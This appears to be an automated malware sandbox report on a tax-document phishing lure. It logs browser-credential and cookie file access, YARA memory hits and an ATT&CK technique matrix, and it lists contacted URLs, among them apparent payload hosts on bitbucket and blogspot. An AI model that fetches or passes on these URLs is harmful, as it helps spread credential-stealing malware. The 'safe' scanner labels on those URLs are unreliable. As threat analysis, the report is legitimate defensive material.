Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\SysWOW64\dllhost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Windows\Temp\user-PC-20250307-1017.log VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

Source: Yara match | File source: 00000016.00000002.1910501136.0000000005730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1892438127.0000000003503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1892438127.0000000003363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1902242469.0000000005640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1887780167.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.1889471588.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1891908767.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1903144848.0000000005933000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings\main\ms-language-packs\browser
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\startupCache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gdaefkejpgkiemlaofpalmlakkmbjdnl
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\thumbnails
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\m8f4v4pw.default
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons Maskable
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cache2
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\safebrowsing\google4
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cache2\entries
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\safebrowsing
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings\main
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cache2\doomed
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings\main\ms-language-packs
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings\main\ms-language-packs\browser\newtab
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\a73433f1-0ec0-4d76-ad13-7ef016f8a256
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnWebGPUCache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons Monochrome
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\discounts_db
            Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents

Remote Access Functionality

| Source | File source | Type |
|---|---|---|
| Yara match | 00000016.00000002.1910501136.0000000005730000.00000040.00001000.00020000.00000000.sdmp | MEMORY |
| Yara match | 00000016.00000002.1892438127.0000000003503000.00000004.00000800.00020000.00000000.sdmp | MEMORY |
| Yara match | 00000016.00000002.1892438127.0000000003363000.00000004.00000800.00020000.00000000.sdmp | MEMORY |
| Yara match | 00000015.00000002.1902242469.0000000005640000.00000040.00001000.00020000.00000000.sdmp | MEMORY |
| Yara match | 00000022.00000003.1887780167.00000000031D0000.00000004.00001000.00020000.00000000.sdmp | MEMORY |
| Yara match | 00000022.00000002.1889471588.00000000036C0000.00000040.00001000.00020000.00000000.sdmp | MEMORY |
| Yara match | 00000015.00000002.1891908767.00000000031B1000.00000004.00000800.00020000.00000000.sdmp | MEMORY |
| Yara match | 00000015.00000002.1903144848.0000000005933000.00000040.00001000.00020000.00000000.sdmp | MEMORY |
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 11 Scripting | Valid Accounts | 31 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 12 File and Directory Discovery | Remote Services | 11 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Extra Window Memory Injection | 1 DLL Side-Loading | LSASS Memory | 244 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 1 Browser Extensions | 511 Process Injection | 1 File Deletion | Security Account Manager | 35 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 1 Extra Window Memory Injection | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 281 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 281 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 511 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |


            windows-stand
| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf | 0% | Avira URL Cloud | safe |

No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://securefilepro.netlify.app/ | 0% | Avira URL Cloud | safe |
| https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js | 0% | Avira URL Cloud | safe |
| https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js | 0% | Avira URL Cloud | safe |
| https://www.securefilepro.com/assets/css/styles.css?v=1.0 | 0% | Avira URL Cloud | safe |
| https://www.securefilepro.com/ | 0% | Avira URL Cloud | safe |
| https://securefilepro.com/portal/favicon.ico | 0% | Avira URL Cloud | safe |
| https://www.securefilepro.com/portal/polyfills.4aee66a14cad3606.js | 0% | Avira URL Cloud | safe |
| https://d12bxbf7nz45kt.cloudfront.net/images/landing/anytime.svg | 0% | Avira URL Cloud | safe |
| https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/alertify.min.js | 0% | Avira URL Cloud | safe |
| https://d12bxbf7nz45kt.cloudfront.net/images/DrakePortals-logo.png | 0% | Avira URL Cloud | safe |
| https://www.securefilepro.com/portal/main.690005fd134686e7.js | 0% | Avira URL Cloud | safe |
| https://d12bxbf7nz45kt.cloudfront.net/images/landing/send.svg | 0% | Avira URL Cloud | safe |
| https://d12bxbf7nz45kt.cloudfront.net/images/landing/relax.svg | 0% | Avira URL Cloud | safe |
| https://www.securefilepro.com/_Incapsula_Resource?SWKMTFSR=1&e=0.08098935374105776 | 0% | Avira URL Cloud | safe |
| https://www.securefilepro.com/portal/styles.cc0a641a0c9da1ad.css | 0% | Avira URL Cloud | safe |
| https://www.securefilepro.com/favicon.ico | 0% | Avira URL Cloud | safe |
| https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/css/alertify.min.css | 0% | Avira URL Cloud | safe |
| https://d12bxbf7nz45kt.cloudfront.net/images/landing/get.svg | 0% | Avira URL Cloud | safe |
| https://www.securefilepro.com/portal/runtime.5be9c3325b3311c4.js | 0% | Avira URL Cloud | safe |
| https://www.securefilepro.com/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=123035775 | 0% | Avira URL Cloud | safe |
| https://bitbucket.org/!api/2.0/snippets/ansidjaassdasmjkkkkk/q7MRe8/3fdc148e8846d2e71b5743d242a56ff62d0a4dfc/files/file | 0% | Avira URL Cloud | safe |
| https://cpa12-march.blogspot.com/faqeeer.pdf | 0% | Avira URL Cloud | safe |
| https://cpa12-march.blogspot.com/atom.xml | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| jsdelivr.map.fastly.net | 151.101.193.229 | true | false | | high |
| bitbucket.org | 185.166.143.49 | true | false | | high |
| chrome.cloudflare-dns.com | 162.159.61.3 | true | false | | high |
| beacons3.gvt2.com | 142.250.185.195 | true | false | | high |
